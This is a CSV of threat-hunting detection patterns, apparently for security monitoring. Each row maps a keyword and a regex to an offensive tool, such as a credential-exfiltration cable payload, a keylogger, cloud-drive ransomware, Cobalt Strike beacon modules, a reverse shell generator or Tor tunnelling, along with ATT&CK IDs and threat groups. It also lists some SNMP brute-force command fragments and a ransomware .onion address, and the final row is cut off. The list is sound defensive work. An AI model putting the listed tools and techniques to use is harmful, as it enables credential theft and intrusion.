"*OlivierLaflamme/PyExec*",".{0,1000}OlivierLaflamme\/PyExec.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","53884" "*OmerYa/Invisi-Shell*",".{0,1000}OmerYa\/Invisi\-Shell.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","53886" "*-OMG-Credz-Plz*",".{0,1000}\-OMG\-Credz\-Plz.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53887" "*OMGdump.zip*",".{0,1000}OMGdump\.zip.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53888" "*OMGLoggerDecoder*",".{0,1000}OMGLoggerDecoder.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53890" "*omg-payloads*/payloads/*",".{0,1000}omg\-payloads.{0,1000}\/payloads\/.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - 
TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53891" "*omg-payloads-master*",".{0,1000}omg\-payloads\-master.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53892" "*omnibus clean metasploit-framework*",".{0,1000}omnibus\sclean\smetasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","53893" "*Omnispray | Modular Enumeration and Password Spraying Framework*",".{0,1000}Omnispray\s\|\sModular\sEnumeration\sand\sPassword\sSpraying\sFramework.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53894" "*OmriBaso/BesoToken*",".{0,1000}OmriBaso\/BesoToken.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","53895" "*omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion*",".{0,1000}omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53896" 
"*On_Demand_C2.*",".{0,1000}On_Demand_C2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","53897" "*On-Demand_C2_BOF.*",".{0,1000}On\-Demand_C2_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","53898" "*OnDemandC2Class.cs*",".{0,1000}OnDemandC2Class\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","53899" "*onecloudemoji/CVE-2022-30190*",".{0,1000}onecloudemoji\/CVE\-2022\-30190.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","N/A","2","104","27","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z","53900" "*onedrive_doubledrive.exe*",".{0,1000}onedrive_doubledrive\.exe.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - 
TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","53901" "*onedrive_doubledrive.py*",".{0,1000}onedrive_doubledrive\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","53902" "*onedrive_enum.py*",".{0,1000}onedrive_enum\.py.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","53903" "*onedrive_exports_version_dll.txt*",".{0,1000}onedrive_exports_version_dll\.txt.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","53904" "*onedrive_ransomware.py*",".{0,1000}onedrive_ransomware\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","53905" 
"*onedrive_user_enum.git*",".{0,1000}onedrive_user_enum\.git.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","53906" "*OneDriveRansomware(CloudDriveRansomware)*",".{0,1000}OneDriveRansomware\(CloudDriveRansomware\).{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","53907" "*One-Lin3r*",".{0,1000}One\-Lin3r.{0,1000}","offensive_tool_keyword","One-Lin3r","One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. 
macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).","T1059 - T1003 - T1053","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/D4Vinci/One-Lin3r","1","1","#linux","N/A","N/A","10","1706","293","2024-10-14T19:18:37Z","2018-01-14T21:26:04Z","53908" "*onesixtyone -c *snmp_default_pass.txt*",".{0,1000}onesixtyone\s\-c\s.{0,1000}snmp_default_pass\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53909" "*onesixtyone -c *wordlists/*",".{0,1000}onesixtyone\s\-c\s.{0,1000}wordlists\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53910" "*onesixtyone -i * -c*",".{0,1000}onesixtyone\s\-i\s.{0,1000}\s\-c.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","53911" "*onesixtyone.1*",".{0,1000}onesixtyone\.1.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","53912" "*onesixtyone.git*",".{0,1000}onesixtyone\.git.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","53913" "*onionpipe --*",".{0,1000}onionpipe\s\-\-.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53914" "*onionpipe *.onion:*",".{0,1000}onionpipe\s.{0,1000}\.onion\:.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53915" "*onionpipe *:*~*",".{0,1000}onionpipe\s.{0,1000}\:.{0,1000}\~.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53916" "*onionpipe /run/*",".{0,1000}onionpipe\s\/run\/.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53917" 
"*onionpipe 8000*",".{0,1000}onionpipe\s8000.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53918" "*onionpipe client new *",".{0,1000}onionpipe\sclient\snew\s.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53919" "*onionpipe/secrets*",".{0,1000}onionpipe\/secrets.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53920" "*onionpipe/tor*",".{0,1000}onionpipe\/tor.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53921" "*onionpipe-darwin-amd64-static*",".{0,1000}onionpipe\-darwin\-amd64\-static.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense 
Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53922" "*onionpipe-linux-amd64-static*",".{0,1000}onionpipe\-linux\-amd64\-static.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53923" "*Online - Reverse Shell Generator*",".{0,1000}Online\s\-\sReverse\sShell\sGenerator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","53924" "*online_brute.gz.torrent*",".{0,1000}online_brute\.gz\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","53926" "*ookjlbkiijinhpmnjffcofjonbfbgaoc*",".{0,1000}ookjlbkiijinhpmnjffcofjonbfbgaoc.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53929" "*Oops!
Your files have been encrypted.*recover all your files safely*",".{0,1000}Oops!\sYour\sfiles\shave\sbeen\sencrypted\..{0,1000}recover\sall\syour\sfiles\ssafely.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","53930" "*opcgpfmipidbgpenhmajoajpbobppdil*",".{0,1000}opcgpfmipidbgpenhmajoajpbobppdil.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53931" "*Opedx765era Neoedx765n\\Usedx765er Daedx765ta*",".{0,1000}Opedx765era\sNeoedx765n\\\\Usedx765er\sDaedx765ta.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","53932" "*Opedx765era Softwedx765are\\Opedx765era GX Staedx765ble*",".{0,1000}Opedx765era\sSoftwedx765are\\\\Opedx765era\sGX\sStaedx765ble.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma 
Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","53933" "*Opeedx765ra Softedx765ware\\Opedx765era Staedx765ble*",".{0,1000}Opeedx765ra\sSoftedx765ware\\\\Opedx765era\sStaedx765ble.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","53934" "*openBeaconBrowser*",".{0,1000}openBeaconBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53938" "*openBeaconBrowser*",".{0,1000}openBeaconBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 